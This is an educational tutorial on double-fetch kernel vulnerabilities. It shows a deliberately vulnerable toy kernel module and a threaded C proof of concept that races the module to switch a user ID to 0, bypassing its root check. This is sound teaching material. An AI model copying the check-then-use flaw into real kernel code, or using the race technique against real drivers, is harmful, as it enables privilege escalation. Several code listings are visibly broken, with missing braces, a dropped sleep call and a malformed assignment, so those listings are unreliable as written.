
The most simple of vulnerabilities

A double-fetch vulnerability is when data is accessed from userspace multiple times. Because userspace programs will commonly pass parameters in to the kernel as pointers, the data can be modified at any time. If it is modified at the exact right time, an attacker could compromise the execution of the kernel.

A Vulnerable Kernel Module

Let's start with a convoluted example, where all we want to do is change the id that the module stores. We are not allowed to set it to 0, as that is the ID of root, but all other values are allowed.

The code below will be the contents of the read() function of a kernel. I've removed the boilerplate code mentioned previously, but here are the relevant parts:

#define PASSWORD    "p4ssw0rd"

typedef struct {
    int id;
    char password[10];
} Credentials;

static int id = 1001;

static ssize_t df_write(struct file *filp, const char __user *buf, size_t count, loff_t *f_pos) {
    Credentials *creds = (Credentials *)buf;

    printk(KERN_INFO "[Double-Fetch] Reading password from user...");

    if (creds->id == 0) {
        printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
        return -1;

    // to increase reliability

    if (!strcmp(creds->password, PASSWORD)) {
        id = creds->id;
        printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
        return id;

    printk(KERN_ALERT "[Double-Fetch] Password incorrect!");
    return -1;

The program will:

  • Check if the ID we are attempting to switch to is 0

    • If it is, it doesn't allow us, as we attempted to log in as root

  • Sleep for 1 second (this is just to illustrate the example better, we will remove it later)

  • Compare the password to p4ssw0rd

    • If it is, it will set the id variable to the id in the creds structure

Simple Communication

Let's say we want to communicate with the module, and we set up a simple C program to do so:

#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

typedef struct {
    int id;
    char password[10];
} Credentials;

int main() {
    int fd = open("/dev/double_fetch", O_RDWR);
    printf("FD: %d\n", fd);

    Credentials creds; = 900;
    strcpy(creds.password, "p4ssw0rd");

    int res_id = write(fd, &creds, 0);    // last parameter here makes no difference
    printf("New ID: %d\n", res_id);

    return 0;

We compile this statically (as there are no shared libraries on our VM):

gcc -static -o exploit exploit.c

As expected, the id variable gets set to 900 - we can check this in dmesg:

$ dmesg
[    3.104165] [Double-Fetch] Password correct! ID set to 900

That all works fine.

Exploiting a Double-Fetch and Switching to ID 0

The flaw here is that creds->id is dereferenced twice. What does this mean? The kernel module is passed a reference to a Credentials struct:

Credentials *creds = (Credentials *)buf;

This is a pointer, and that is perhaps the most important thing to remember. When we interact with the module, we give it a specific memory address. This memory address holds the Credentials struct that we define and pass to the module. The kernel does not have a copy - it relies on the user's copy, and goes to userspace memory to use it.

Because this struct is controlled by the user, they have the power to change it whenever they like.

The kernel module uses the id field of the struct on two separate occasions. Firstly, to check that the ID we wish to swap to is valid (not 0):

if (creds->id == 0) {
    printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
    return -1;

And once more, to set the id variable:

if (!strcmp(creds->password, PASSWORD)) {
    id = creds->id;
    printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
    return id;

Again, this might seem fine - but it's not. What is stopping it from changing inbetween these two uses? The answer is simple: nothing. That is what differentiates userspace exploitation from kernel space.

A Proof-of-Concept: Switching to ID 0

Inbetween the two dereferences creds->id, there is a timeframe. Here, we have artificially extended it (by sleeping for one second). We have a race codition - the aim is to switch id in that timeframe. If we do this successfully, we will pass the initial check (as the ID will start off as 900), but by the time it is copied to id, it will have become 0 and we have bypassed the security check.

Here's the plan, visually, if it helps:

In the waiting period, we swap out the id.

With that in mind, the "exploit" is fairly self-explanatory - we start another thread, wait 0.3 seconds, and change id!

// gcc -static -o exploit -pthread exploit.c

#include <fcntl.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

void *switcher(void *arg);

typedef struct {
    int id;
    char password[10];
} Credentials;

int main() {
    // communicate with the module
    int fd = open("/dev/double_fetch", O_RDWR);
    printf("FD: %d\n", fd);

    // use a random ID and set the password correctly
    Credentials creds; = 900;
    strcpy(creds.password, "p4ssw0rd");

    // set up the switcher thread
    // pass it a pointer to `creds`, so it can modify it
    pthread_t thread;

    if (pthread_create(&thread, NULL, switcher, &creds)) {
        fprintf(stderr, "Error creating thread\n");
        return -1;

    // now we write the cred struct to the module
    // it should be swapped after about .3 seconds by switcher
    int res_id = write(fd, &creds, 0);

    // write returns the id we switched to
    // if all goes well, that is 0
    printf("New ID: %d\n", res_id);

    // finish thread cleanly
    if (pthread_join(thread, NULL)) {
        fprintf(stderr, "Error joining thread\n");
        return -1;

    return 0;

void *switcher(void *arg) {
    Credentials *creds = (Credentials *)arg;

    // wait until the module is sleeping - don't want to change it BEFORE the initial ID check!

    creds->id = 0;

We have to compile it statically, as the VM has no shared libraries.

$ gcc -static -o exploit -pthread exploit.c

Now we have to somehow get it into the file system. In order to do that, we need to first extract the .cpio archive (you may want to do this in another folder):

$ cpio -i -F initramfs.cpio

Now copy exploit there and make sure it's marked executable. You can then compress the filesystem again:

$ find . -not -name *.cpio | cpio -o -H newc > initramfs.cpio

Use the newly-created initramfs.cpio to lauch the VM with Executing exploit, it is successful!

~ # ./exploit 
FD: 3
New ID: 0

Last updated

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